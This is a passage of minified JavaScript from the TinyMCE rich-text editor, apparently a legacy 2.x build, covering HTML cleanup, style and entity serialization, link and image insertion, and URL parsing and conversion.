"color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return 